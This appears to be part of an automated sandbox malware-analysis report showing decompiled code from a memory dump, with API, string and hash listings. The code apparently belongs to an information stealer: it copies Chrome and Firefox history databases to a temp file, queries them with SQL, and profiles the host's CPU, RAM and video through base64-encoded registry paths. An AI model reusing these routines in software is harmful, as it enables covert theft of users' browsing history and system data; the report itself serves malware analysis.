                                                                                                                                                                                          				_t62 =  &_v44; // 0x6f747341
                                                                                                                                                                                          				E00403B98(_t62, 2);
                                                                                                                                                                                          				_t63 =  &_v36; // 0x6f747349
                                                                                                                                                                                          				E004034E4(_t63);
                                                                                                                                                                                          				_t64 =  &_v32; // 0x6f74734d
                                                                                                                                                                                          				E00403B98(_t64, 2);
                                                                                                                                                                                          				_t65 =  &_v8; // 0x6f747365
                                                                                                                                                                                          				return E00403B80(_t65);
                                                                                                                                                                                          			}

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004129E8
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00412C05
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • .tmp, xrefs: 00412A03
                                                                                                                                                                                          • %TEMP%, xrefs: 00412A23
                                                                                                                                                                                          • , xrefs: 00412B98
                                                                                                                                                                                          • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                          • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                          			E0041256C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				WCHAR* _t86;
                                                                                                                                                                                          				intOrPtr* _t101;
                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                          				intOrPtr* _t105;
                                                                                                                                                                                          				intOrPtr* _t109;
                                                                                                                                                                                          				intOrPtr* _t138;
                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                          				intOrPtr* _t142;
                                                                                                                                                                                          				void* _t144;
                                                                                                                                                                                          				intOrPtr* _t152;
                                                                                                                                                                                          				intOrPtr* _t158;
                                                                                                                                                                                          				intOrPtr* _t164;
                                                                                                                                                                                          				void* _t166;
                                                                                                                                                                                          				void* _t178;
                                                                                                                                                                                          				intOrPtr _t198;
                                                                                                                                                                                          				intOrPtr _t200;
                                                                                                                                                                                          				intOrPtr _t213;
                                                                                                                                                                                          				intOrPtr _t217;
                                                                                                                                                                                          				intOrPtr _t218;
                                                                                                                                                                                          				void* _t219;
                                                                                                                                                                                          				void* _t220;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t215 = __esi;
                                                                                                                                                                                          				_t177 = __ebx;
                                                                                                                                                                                          				_t217 = _t218;
                                                                                                                                                                                          				_t178 = 0xb;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t178 = _t178 - 1;
                                                                                                                                                                                          					_t223 = _t178;
                                                                                                                                                                                          				} while (_t178 != 0);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				_push(_t217);
                                                                                                                                                                                          				_push(0x412839);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t218;
                                                                                                                                                                                          				E00403B80( &_v28);
                                                                                                                                                                                          				_push(_t217);
                                                                                                                                                                                          				_push(0x4127af);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t218;
                                                                                                                                                                                          				E00406FDC(GetTickCount(), __ebx,  &_v60, __esi, _t223);
                                                                                                                                                                                          				_push(_v60);
                                                                                                                                                                                          				E00406F1C( &_v64, __ebx, __edi, __esi, _t223);
                                                                                                                                                                                          				_push(_v64);
                                                                                                                                                                                          				_push(L".tmp");
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v8, _t177,  &_v40, _t223);
                                                                                                                                                                                          				E004062D8(L"%TEMP%",  &_v72, _t223);
                                                                                                                                                                                          				_push(_v72);
                                                                                                                                                                                          				_push(0x412870);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v68, _t177,  &_v44, _t223);
                                                                                                                                                                                          				_t86 = E00403D3C(_v44);
                                                                                                                                                                                          				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
                                                                                                                                                                                          				E0040377C( &_v76, _v44);
                                                                                                                                                                                          				E00404AFC(_v76, _t177, _t178,  &_v36, _t215, _t223);
                                                                                                                                                                                          				E00403D2C( &_v80, _v36);
                                                                                                                                                                                          				if(E004076B0(_v80, _t177, _t178) != 0) {
                                                                                                                                                                                          					_t101 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                          					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
                                                                                                                                                                                          					_t219 = _t218 + 8;
                                                                                                                                                                                          					__eflags = _t103;
                                                                                                                                                                                          					if(_t103 == 0) {
                                                                                                                                                                                          						_t138 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                          						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME(moz_historyvisits.visit_date/1000000, \"unixepoch\", \"localtime\"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                          						_t220 = _t219 + 0x14;
                                                                                                                                                                                          						__eflags = _t140;
                                                                                                                                                                                          						if(_t140 == 0) {
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t142 =  *0x41b600; // 0x41c790
                                                                                                                                                                                          								_t144 =  *((intOrPtr*)( *_t142))(_v20);
                                                                                                                                                                                          								__eflags = _t144 - 0x64;
                                                                                                                                                                                          								if(_t144 != 0x64) {
                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								E004034E4( &_v48);
                                                                                                                                                                                          								E004034E4( &_v52);
                                                                                                                                                                                          								E004034E4( &_v56);
                                                                                                                                                                                          								_t152 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
                                                                                                                                                                                          								_t158 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
                                                                                                                                                                                          								_t164 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
                                                                                                                                                                                          								_t220 = _t220 + 0x18;
                                                                                                                                                                                          								E004036DC( &_v56, _t166);
                                                                                                                                                                                          								_push(_v28);
                                                                                                                                                                                          								_push(0x412978);
                                                                                                                                                                                          								E00403D2C( &_v84, _v48);
                                                                                                                                                                                          								_push(_v84);
                                                                                                                                                                                          								_push(0x412980);
                                                                                                                                                                                          								E00403D2C( &_v88, _v52);
                                                                                                                                                                                          								_push(_v88);
                                                                                                                                                                                          								_push(0x41298c);
                                                                                                                                                                                          								E00403D2C( &_v92, _v56);
                                                                                                                                                                                          								_push(_v92);
                                                                                                                                                                                          								_push(L"\r\n\r\n");
                                                                                                                                                                                          								E00403E1C();
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L9:
                                                                                                                                                                                          					_t105 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t105))(_v20);
                                                                                                                                                                                          					_t109 =  *0x41b590; // 0x41c788
                                                                                                                                                                                          					 *((intOrPtr*)( *_t109))(_v16);
                                                                                                                                                                                          					_pop(_t198);
                                                                                                                                                                                          					 *[fs:eax] = _t198;
                                                                                                                                                                                          					E00403BBC(_v12, _v28);
                                                                                                                                                                                          					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_pop(_t213);
                                                                                                                                                                                          					 *[fs:eax] = _t213;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t200);
                                                                                                                                                                                          				 *[fs:eax] = _t200;
                                                                                                                                                                                          				_push(E00412840);
                                                                                                                                                                                          				E00403B98( &_v92, 4);
                                                                                                                                                                                          				E004034E4( &_v76);
                                                                                                                                                                                          				E00403B98( &_v72, 4);
                                                                                                                                                                                          				E00403508( &_v56, 3);
                                                                                                                                                                                          				E00403B98( &_v44, 2);
                                                                                                                                                                                          				E004034E4( &_v36);
                                                                                                                                                                                          				E00403B98( &_v32, 2);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004125B0
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 004127CD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
                                                                                                                                                                                          • .tmp, xrefs: 004125CB
                                                                                                                                                                                          • %TEMP%, xrefs: 004125EB
                                                                                                                                                                                          • , xrefs: 00412760
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                          • String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
                                                                                                                                                                                          • API String ID: 2381671008-462058183
                                                                                                                                                                                          • Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                                                                                                                                                                                          • Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
                                                                                                                                                                                          • Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00416744(signed int __eax, void* __ebx, void* __esi) {
                                                                                                                                                                                          				struct _SYSTEM_INFO _v40;
                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                          				signed int _t91;
                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                          				intOrPtr _t112;
                                                                                                                                                                                          				void* _t116;
                                                                                                                                                                                          				intOrPtr _t119;
                                                                                                                                                                                          				intOrPtr _t120;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t117 = __esi;
                                                                                                                                                                                          				_t38 = __eax | 0x5500000a;
                                                                                                                                                                                          				_t119 = _t120;
                                                                                                                                                                                          				_t92 = 0xb;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t92 = _t92 - 1;
                                                                                                                                                                                          					_t122 = _t92;
                                                                                                                                                                                          				} while (_t92 != 0);
                                                                                                                                                                                          				_t91 = _t38;
                                                                                                                                                                                          				_push(_t119);
                                                                                                                                                                                          				_push(0x4168d4);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t120;
                                                                                                                                                                                          				GetSystemInfo( &_v40);
                                                                                                                                                                                          				E00403D2C( &_v48,  *_t91);
                                                                                                                                                                                          				_push(_v48);
                                                                                                                                                                                          				_push(L"CPU Model: ");
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push( &_v52);
                                                                                                                                                                                          				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t91,  &_v60, _t116, __esi);
                                                                                                                                                                                          				E00403D2C( &_v56, _v60);
                                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                                          				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t91,  &_v68, _t116, __esi);
                                                                                                                                                                                          				E00403D2C( &_v64, _v68);
                                                                                                                                                                                          				_pop(_t93);
                                                                                                                                                                                          				E00407500(0x80000002, _t91, _t93, _v64);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				_push(0x416974);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t91, _v44);
                                                                                                                                                                                          				E004037DC( &_v80, "CPU Count: ",  *_t91);
                                                                                                                                                                                          				E00403D2C( &_v76, _v80);
                                                                                                                                                                                          				_push(_v76);
                                                                                                                                                                                          				E00406FDC(_v40.dwNumberOfProcessors, _t91,  &_v84, _t117, _t122);
                                                                                                                                                                                          				_push(_v84);
                                                                                                                                                                                          				_push(0x416974);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t91, _v72);
                                                                                                                                                                                          				_push( *_t91);
                                                                                                                                                                                          				_push("GetRAM: ");
                                                                                                                                                                                          				E00416584( &_v88, _t91, _t117, _t122);
                                                                                                                                                                                          				_push(_v88);
                                                                                                                                                                                          				_push(0x4169ac);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t91);
                                                                                                                                                                                          				_push("Video Info\r\n");
                                                                                                                                                                                          				E00416644( &_v92, _t91, _t116, _t117);
                                                                                                                                                                                          				_push(_v92);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_t112 = 0x4169ac;
                                                                                                                                                                                          				 *[fs:eax] = _t112;
                                                                                                                                                                                          				_push(E004168DB);
                                                                                                                                                                                          				E00403508( &_v92, 2);
                                                                                                                                                                                          				E00403B80( &_v84);
                                                                                                                                                                                          				E004034E4( &_v80);
                                                                                                                                                                                          				E00403B98( &_v76, 2);
                                                                                                                                                                                          				E004034E4( &_v68);
                                                                                                                                                                                          				E00403B80( &_v64);
                                                                                                                                                                                          				E004034E4( &_v60);
                                                                                                                                                                                          				return E00403B98( &_v56, 4);
                                                                                                                                                                                          			}

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString$InfoSystem
                                                                                                                                                                                          • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                          • API String ID: 4070941872-1038824218
                                                                                                                                                                                          • Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                                                                                                                                          • Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00416748(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                          				struct _SYSTEM_INFO _v40;
                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				intOrPtr* _t90;
                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                          				intOrPtr _t111;
                                                                                                                                                                                          				intOrPtr _t118;
                                                                                                                                                                                          				intOrPtr _t119;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t116 = __esi;
                                                                                                                                                                                          				_t115 = __edi;
                                                                                                                                                                                          				_t118 = _t119;
                                                                                                                                                                                          				_t91 = 0xb;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t91 = _t91 - 1;
                                                                                                                                                                                          					_t120 = _t91;
                                                                                                                                                                                          				} while (_t91 != 0);
                                                                                                                                                                                          				_t90 = __eax;
                                                                                                                                                                                          				_push(_t118);
                                                                                                                                                                                          				_push(0x4168d4);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t119;
                                                                                                                                                                                          				GetSystemInfo( &_v40);
                                                                                                                                                                                          				E00403D2C( &_v48,  *_t90);
                                                                                                                                                                                          				_push(_v48);
                                                                                                                                                                                          				_push(L"CPU Model: ");
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push( &_v52);
                                                                                                                                                                                          				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t90,  &_v60, __edi, __esi);
                                                                                                                                                                                          				E00403D2C( &_v56, _v60);
                                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                                          				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t90,  &_v68, __edi, __esi);
                                                                                                                                                                                          				E00403D2C( &_v64, _v68);
                                                                                                                                                                                          				_pop(_t92);
                                                                                                                                                                                          				E00407500(0x80000002, _t90, _t92, _v64);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				_push(0x416974);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t90, _v44);
                                                                                                                                                                                          				E004037DC( &_v80, "CPU Count: ",  *_t90);
                                                                                                                                                                                          				E00403D2C( &_v76, _v80);
                                                                                                                                                                                          				_push(_v76);
                                                                                                                                                                                          				E00406FDC(_v40.dwNumberOfProcessors, _t90,  &_v84, _t116, _t120);
                                                                                                                                                                                          				_push(_v84);
                                                                                                                                                                                          				_push(0x416974);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t90, _v72);
                                                                                                                                                                                          				_push( *_t90);
                                                                                                                                                                                          				_push("GetRAM: ");
                                                                                                                                                                                          				E00416584( &_v88, _t90, _t116, _t120);
                                                                                                                                                                                          				_push(_v88);
                                                                                                                                                                                          				_push(0x4169ac);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t90);
                                                                                                                                                                                          				_push("Video Info\r\n");
                                                                                                                                                                                          				E00416644( &_v92, _t90, _t115, _t116);
                                                                                                                                                                                          				_push(_v92);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_t111 = 0x4169ac;
                                                                                                                                                                                          				 *[fs:eax] = _t111;
                                                                                                                                                                                          				_push(E004168DB);
                                                                                                                                                                                          				E00403508( &_v92, 2);
                                                                                                                                                                                          				E00403B80( &_v84);
                                                                                                                                                                                          				E004034E4( &_v80);
                                                                                                                                                                                          				E00403B98( &_v76, 2);
                                                                                                                                                                                          				E004034E4( &_v68);
                                                                                                                                                                                          				E00403B80( &_v64);
                                                                                                                                                                                          				E004034E4( &_v60);
                                                                                                                                                                                          				return E00403B98( &_v56, 4);
                                                                                                                                                                                          			}
























                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString$InfoSystem
                                                                                                                                                                                          • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                          • API String ID: 4070941872-1038824218
                                                                                                                                                                                          • Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                                                                                                                                          • Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
                                                                                                                                                                                          • Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00403368(void* __ecx) {
                                                                                                                                                                                          				long _v4;
                                                                                                                                                                                          				int _t3;
                                                                                                                                                                                          
                                                                                                                                                                                          				if( *0x41c034 == 0) {
                                                                                                                                                                                          					if( *0x41b024 == 0) {
                                                                                                                                                                                          						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                                                                                                                          					}
                                                                                                                                                                                          					return _t3;
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					if( *0x41c208 == 0xd7b2 &&  *0x41c210 > 0) {
                                                                                                                                                                                          						 *0x41c220();
                                                                                                                                                                                          					}
                                                                                                                                                                                          					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                                                                                                                          					return WriteFile(GetStdHandle(0xfffffff5), E004033F0, 2,  &_v4, 0);
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}






                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
                                                                                                                                                                                          • MessageBoxA.USER32 ref: 004033E0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                                          • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                                                                                                          • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402668(CHAR* __eax, intOrPtr* __edx) {
                                                                                                                                                                                          				char _t5;
                                                                                                                                                                                          				char _t6;
                                                                                                                                                                                          				CHAR* _t7;
                                                                                                                                                                                          				char _t9;
                                                                                                                                                                                          				CHAR* _t11;
                                                                                                                                                                                          				char _t14;
                                                                                                                                                                                          				CHAR* _t15;
                                                                                                                                                                                          				char _t17;
                                                                                                                                                                                          				CHAR* _t19;
                                                                                                                                                                                          				CHAR* _t22;
                                                                                                                                                                                          				CHAR* _t23;
                                                                                                                                                                                          				CHAR* _t32;
                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                          				intOrPtr* _t34;
                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t34 = __edx;
                                                                                                                                                                                          				_t22 = __eax;
                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                          					L2:
                                                                                                                                                                                          					_t5 =  *_t22;
                                                                                                                                                                                          					if(_t5 != 0 && _t5 <= 0x20) {
                                                                                                                                                                                          						_t22 = CharNextA(_t22);
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L2:
                                                                                                                                                                                          					_t5 =  *_t22;
                                                                                                                                                                                          					if(_t5 != 0 && _t5 <= 0x20) {
                                                                                                                                                                                          						_t22 = CharNextA(_t22);
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L4:
                                                                                                                                                                                          					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                                                                                                                                                                                          						_t36 = 0;
                                                                                                                                                                                          						_t32 = _t22;
                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                          							_t6 =  *_t22;
                                                                                                                                                                                          							if(_t6 <= 0x20) {
                                                                                                                                                                                          								break;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							if(_t6 != 0x22) {
                                                                                                                                                                                          								_t7 = CharNextA(_t22);
                                                                                                                                                                                          								_t36 = _t36 + _t7 - _t22;
